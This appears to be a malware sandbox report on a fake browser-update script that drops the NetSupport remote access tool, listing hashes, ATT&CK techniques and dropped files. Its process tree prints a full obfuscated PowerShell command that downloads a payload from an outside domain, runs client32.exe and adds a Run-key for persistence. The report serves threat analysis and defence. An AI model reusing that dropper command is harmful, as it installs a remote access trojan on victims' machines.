netsupport | 9b77ce9fb306d0cefc655ac7344838ec9484100b5353d5d73ef005db46b53369

Analysis

max time kernel
672s
max time network
1820s
platform
windows10-1703_x64
resource
win10-20231215-en
resource tags

arch:x64arch:x86image:win10-20231215-enlocale:en-usos:windows10-1703-x64system
submitted
26/12/2023, 17:35

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Update_browser_17.6436.js
Size

296KB
MD5

6bc9eccb481ac65cac1938e7f9a2b7e6
SHA1

1a975ed336ed6ce8da390ea48163f5886726b628
SHA256

9b77ce9fb306d0cefc655ac7344838ec9484100b5353d5d73ef005db46b53369
SHA512

e147814426d81ab2f7c77daebbaef3c2110188142aa877b4e514c5cf9a0b870b28f9613ed0f259d81b15c2b650673e3961c71d58e956d1ecfd049bd979b2617b
SSDEEP

3072:4OpyDJu8XUtQQSO1T7cbF/nlz3wq2B9OpyDJu8XUtQQSO1T7cbF/nlz3wq2Bp:lcJ6QhO1T7cZd6BYcJ6QhO1T7cZd6Bp

Score

10^/10

netsupport persistence rat

Malware Config

Extracted

Language

ps1

Source

URLs

ps1.dropper

https://proximaideia.com/GetData.php?7576

exe.dropper

https://proximaideia.com/GetData.php?7576

Signatures

NetSupport
NetSupport is a remote access tool sold as a legitimate system administration software.
rat netsupport

Blocklisted process makes network request 2 IoCs

flow	pid	Process
7	368	wscript.exe
11	4648	powershell.exe

Executes dropped EXE 1 IoCs

pid	Process
4356	client32.exe

Loads dropped DLL 6 IoCs

pid	Process
4356	client32.exe
4356	client32.exe
4356	client32.exe
4356	client32.exe
4356	client32.exe
4356	client32.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-721438792-2341338383-2410509276-1000\Software\Microsoft\Windows\CurrentVersion\Run\DIVXX = "C:\\Users\\Admin\\AppData\\Roaming\\DIVX-348\\client32.exe"	powershell.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Script User-Agent 1 IoCs

Uses user-agent string associated with script host/environment.

description	flow	ioc
HTTP User-Agent header	7	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

Suspicious behavior: EnumeratesProcesses 3 IoCs

pid	Process
4648	powershell.exe
4648	powershell.exe
4648	powershell.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	4648	powershell.exe
Token: SeSecurityPrivilege	4356	client32.exe

Suspicious use of FindShellTrayWindow 1 IoCs

pid	Process
4356	client32.exe

Suspicious use of WriteProcessMemory 5 IoCs

description	pid	Process	procid_target
PID 368 wrote to memory of 4648	368	wscript.exe	73
PID 368 wrote to memory of 4648	368	wscript.exe	73
PID 4648 wrote to memory of 4356	4648	powershell.exe	75
PID 4648 wrote to memory of 4356	4648	powershell.exe	75
PID 4648 wrote to memory of 4356	4648	powershell.exe	75

C:\Windows\system32\wscript.exe
wscript.exe C:\Users\Admin\AppData\Local\Temp\Update_browser_17.6436.js
1⤵
- Blocklisted process makes network request
- Suspicious use of WriteProcessMemory
PID:368
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex Bypass -NoP -C $bODgjyeEBxZcHQyroAab='https://proximaideia.com/GetData.php?7576';$MnkleHIJxhncTejghBIeMKLCQtNnsxX=(New-Object System.Net.WebClient).DownloadString($bODgjyeEBxZcHQyroAab);$ZaxurWMHuK=[System.Convert]::FromBase64String($MnkleHIJxhncTejghBIeMKLCQtNnsxX);$zxc = Get-Random -Minimum -1000 -Maximum 1000; $KtzLfZzOFZBPCFeVGQXMBTHkCGrQToIjd=[System.Environment]::GetFolderPath('ApplicationData')+'\DIVX'+$zxc;if (!(Test-Path $KtzLfZzOFZBPCFeVGQXMBTHkCGrQToIjd -PathType Container)) { New-Item -Path $KtzLfZzOFZBPCFeVGQXMBTHkCGrQToIjd -ItemType Directory };$p=Join-Path $KtzLfZzOFZBPCFeVGQXMBTHkCGrQToIjd 'rtrs.zip';[System.IO.File]::WriteAllBytes($p,$ZaxurWMHuK);try { Add-Type -A System.IO.Compression.FileSystem; [System.IO.Compression.ZipFile]::ExtractToDirectory($p,$KtzLfZzOFZBPCFeVGQXMBTHkCGrQToIjd)} catch { Write-Host 'Failed: ' + $_; exit};$e=Join-Path $KtzLfZzOFZBPCFeVGQXMBTHkCGrQToIjd 'client32.exe';if (Test-Path $e -PathType Leaf) { Start-Process -FilePath $e} else { Write-Host 'No exe.'};$FSDFSSD=Get-Item $KtzLfZzOFZBPCFeVGQXMBTHkCGrQToIjd -Force; $FSDFSSD.attributes='Hidden';$s=$KtzLfZzOFZBPCFeVGQXMBTHkCGrQToIjd+'\client32.exe';$k='HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run';$v='DIVXX';$t='String';New-ItemProperty -Path $k -Name $v -Value $s -PropertyType $t;
  2⤵
  - Blocklisted process makes network request
  - Adds Run key to start application
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:4648
- - C:\Users\Admin\AppData\Roaming\DIVX-348\client32.exe
    "C:\Users\Admin\AppData\Roaming\DIVX-348\client32.exe"
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of FindShellTrayWindow
    PID:4356

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ekpygwgq.fuu.ps1

Filesize
1B

MD5
c4ca4238a0b923820dcc509a6f75849b

SHA1
356a192b7913b04c54574d18c28d46e6395428ab

SHA256
6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b

SHA512
4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

Download Submit
C:\Users\Admin\AppData\Roaming\DIVX-348\HTCTL32.DLL

Filesize
192KB

MD5
6c3fd5663dc4e569110d4a076f6c5c21

SHA1
693c9438fa2223501fbc5877585cfc2ea6f07a21

SHA256
417b017fb50860f7903bbd0c628e1c3a2a0e98e299252ca0e5ba33153c6ed955

SHA512
301ee2bb3755951efab975eaefaab7f5ca84a09052cd972465a5038c6a3fd15ea8258c28595d943b7b3ac8dfdbe326de34134a06ed4f69b410194c0511096c20

Download Submit
C:\Users\Admin\AppData\Roaming\DIVX-348\MSVCR100.dll

Filesize
156KB

MD5
2afb46780fb075e851c3d248b1f178e0

SHA1
4bee5cb205415e74a96fbacfc27f3e717c90d6aa

SHA256
6bd6de779b11baa3da5a1105509e691244c00a542c1a68c0a77d7df3a5f177c0

SHA512
86b4ff867b3351a2c497c81746bf674f732f1080ba7b78bc483fe9b10ce2f0a74d6b594a0ca661d8ed0f696b2876d75ce0ae648b91c6ec14a956de969dafcb4e

Download Submit
C:\Users\Admin\AppData\Roaming\DIVX-348\NSM.LIC

Filesize
258B

MD5
1b41e64c60ca9dfadeb063cd822ab089

SHA1
abfcd51bb120a7eae5bbd9a99624e4abe0c9139d

SHA256
f4e2f28169e0c88b2551b6f1d63f8ba513feb15beacc43a82f626b93d673f56d

SHA512
c97e0eabea62302a4cfef974ac309f3498505dd055ba74133ee2462e215b3ebc5c647e11bcbac1246b9f750b5d09240ca08a6b617a7007f2fa955f6b6dd7fee4

Download Submit
C:\Users\Admin\AppData\Roaming\DIVX-348\PCICL32.dll

Filesize
1.1MB

MD5
d5f8125a1f548c778342b80c8bc225b1

SHA1
cb5721bbcb5a97fa35bea1da002ec0fef21eda18

SHA256
eef91bd3f45dd0132afed40ffd3088e11cf86d6a881086c730bbffa42eb01c86

SHA512
6dbb9b35b4e7433095fb80742eff2d2c21f14ca21641a74a16431f8f8e458f5f70b811abf4d48db1810ad72f835c23f4eb2d2fb45f0ed75ae339106043f2a454

Download Submit
C:\Users\Admin\AppData\Roaming\DIVX-348\client32.exe

Filesize
101KB

MD5
c4f1b50e3111d29774f7525039ff7086

SHA1
57539c95cba0986ec8df0fcdea433e7c71b724c6

SHA256
18df68d1581c11130c139fa52abb74dfd098a9af698a250645d6a4a65efcbf2d

SHA512
005db65cedaaccc85525fb3cdab090054bb0bb9cc8c37f8210ec060f490c64945a682b5dd5d00a68ac2b8c58894b6e7d938acaa1130c1cc5667e206d38b942c5

Download Submit
C:\Users\Admin\AppData\Roaming\DIVX-348\client32.ini

Filesize
670B

MD5
b11f62b15f97cf5afb117e967c223882

SHA1
d6cc3f4c7cad5bf28d9c44bee2362b8edc69097b

SHA256
13fe71354608a9345d9d7c1600568ec911d718ece989442a39a5601e5fe35586

SHA512
85dbba7dcb1aa1015c186567b06ca2ae5a782a21b0b4008496fb831b39f27e5ee79c716e46aa07a9392fd3037aa1e7b4dbb47f217b1f0eb1c7fc9516d775cc7a

Download Submit
C:\Users\Admin\AppData\Roaming\DIVX-348\pcichek.dll

Filesize
18KB

MD5
104b30fef04433a2d2fd1d5f99f179fe

SHA1
ecb08e224a2f2772d1e53675bedc4b2c50485a41

SHA256
956b9fa960f913cce3137089c601f3c64cc24c54614b02bba62abb9610a985dd

SHA512
5efcaa8c58813c3a0a6026cd7f3b34ad4fb043fd2d458db2e914429be2b819f1ac74e2d35e4439601cf0cb50fcdcafdcf868da328eaaeec15b0a4a6b8b2c218f

Download Submit
\Users\Admin\AppData\Roaming\DIVX-348\HTCTL32.DLL

Filesize
152KB

MD5
abcae41fe965b96d537c7a57f898c11f

SHA1
db074c75fc428ab70ef623d3a69ae65d8fcc68f9

SHA256
ef2fd7cb84273900aa1e83aad0bcc18f3ad0dc5228b32738de10355b753c8fb5

SHA512
8f0dfebf40502e505fada031090f3dbc7c22f8af88e021044dda313ee085c7040aa2f41b013253b80bbb9de2aeedf803fc3af36379850d9ea6c8d57ff4d88d3b

Download Submit
\Users\Admin\AppData\Roaming\DIVX-348\PCICL32.DLL

Filesize
472KB

MD5
9d134fd7a8cbf37727110bb96c469685

SHA1
2f02480dc63232cc113731c9330bf695509fc5ed

SHA256
6270055cde0ea59301baa36bcc704caf7dfe28f3707df499e3f29b81eef22aa3

SHA512
bbaf9e955e93209f588d7f87dca4f8376a54acec397edb32c4f6d90cec0323ef82eae9b4ea9bf86434c19c49132a907f1595e2f9dabfa1eaad35fc3ebe1de78e

Download Submit
\Users\Admin\AppData\Roaming\DIVX-348\msvcr100.dll

Filesize
257KB

MD5
d7af6ac4e67befc47a3980b33cda3609

SHA1
ad8e49c5ec558b8ea78fb54156c3497c147a880a

SHA256
3b72452ccc27646d2cdeb3198403284b83a562eaeeeb056c62bb6a0762041523

SHA512
aa2e2975bcaeb4268db0bb68bb0d707304897c0ae3f2361bf35854c0f5995e691b0e588c40a77bb72e68220cc5f31e2e63751b7a3f5b42cf6774c0e88222d53e

Download Submit
\Users\Admin\AppData\Roaming\DIVX-348\msvcr100.dll

Filesize
190KB

MD5
d6d0dc4c2bcd7ce484582e5d07a8ab85

SHA1
770d58cf7a6daea14b6ee2368a83f0ce03460d02

SHA256
93cf2de6cc24058cc9dc7aa81bfb7a42f2d8c83e10293951bb19c488cf86b78a

SHA512
e07558d9b95909a12220689e2a927b113ffe4fa3cceff7352fda3154202712c4d7f1c7c66f38cf5f9629ac0c8d81d46c9b5a3bc00027655044096b2ccf6e1fcd

Download Submit
\Users\Admin\AppData\Roaming\DIVX-348\pcicapi.dll

Filesize
32KB

MD5
34dfb87e4200d852d1fb45dc48f93cfc

SHA1
35b4e73fb7c8d4c3fefb90b7e7dc19f3e653c641

SHA256
2d6c6200508c0797e6542b195c999f3485c4ef76551aa3c65016587788ba1703

SHA512
f5bb4e700322cbaa5069244812a9b6ce6899ce15b4fd6384a3e8be421e409e4526b2f67fe210394cd47c4685861faf760eff9af77209100b82b2e0655581c9b2

Download Submit
memory/4648-25-0x0000013E7C5E0000-0x0000013E7C5F0000-memory.dmp

Filesize
64KB

Download
memory/4648-48-0x0000013E7CA50000-0x0000013E7CA62000-memory.dmp

Filesize
72KB

Download
memory/4648-47-0x0000013E7C880000-0x0000013E7C88A000-memory.dmp

Filesize
40KB

Download
memory/4648-29-0x0000013E7C5E0000-0x0000013E7C5F0000-memory.dmp

Filesize
64KB

Download
memory/4648-28-0x0000013E7C5E0000-0x0000013E7C5F0000-memory.dmp

Filesize
64KB

Download
memory/4648-27-0x0000013E7C5E0000-0x0000013E7C5F0000-memory.dmp

Filesize
64KB

Download
memory/4648-26-0x00007FFA90DE0000-0x00007FFA917CC000-memory.dmp

Filesize
9.9MB

Download
memory/4648-4-0x0000013E7C5F0000-0x0000013E7C612000-memory.dmp

Filesize
136KB

Download
memory/4648-10-0x0000013E7C8A0000-0x0000013E7C916000-memory.dmp

Filesize
472KB

Download
memory/4648-7-0x0000013E7C5E0000-0x0000013E7C5F0000-memory.dmp

Filesize
64KB

Download
memory/4648-112-0x00007FFA90DE0000-0x00007FFA917CC000-memory.dmp

Filesize
9.9MB

Download
memory/4648-6-0x0000013E7C5E0000-0x0000013E7C5F0000-memory.dmp

Filesize
64KB

Download
memory/4648-5-0x00007FFA90DE0000-0x00007FFA917CC000-memory.dmp

Filesize
9.9MB

Download